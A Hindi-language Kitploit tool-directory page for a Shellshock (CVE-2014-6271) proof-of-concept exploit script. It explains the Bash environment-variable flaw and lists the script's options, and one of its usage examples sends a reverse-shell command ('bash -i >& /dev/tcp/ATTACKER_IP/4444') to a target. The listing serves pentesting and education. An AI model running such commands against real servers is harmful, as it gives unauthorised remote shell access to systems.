Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 Exploit | by infrar3d | Kitploit
उपकरण/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 Exploit | by infrar3d

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
5 महीने पहलेअभी तक समीक्षित नहीं

CVE-2014-6271 Shellshock

द्वारा शोषित infrar3d

यह रिपॉजिटरी CVE-2014-6271 (Shellshock) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल करता है।

Shellshock GNU Bash में एक गंभीर कमजोरी है जहाँ विशेष रूप से तैयार किए गए पर्यावरण चर मनमाना कमांड निष्पादन की अनुमति देते हैं।
जब कोई वेब सर्वर CGI स्क्रिप्ट में HTTP हेडर भेजता है जो Bash को आमंत्रित करती हैं, तो हमलावर उन हेडर के माध्यम से कमांड इंजेक्ट कर सकता है।

उपयोग:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

उदाहरण:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(VulnHub मशीन "Hacksudo - Thor" पर परीक्षण किया गया)

⚠️ अस्वीकरण ⚠️

यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

  • लेखक इस प्रोग्राम के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
  • स्पष्ट पूर्व अनुमति के बिना किसी भी सिस्टम पर उपयोग न करें।
  • सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है।

आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें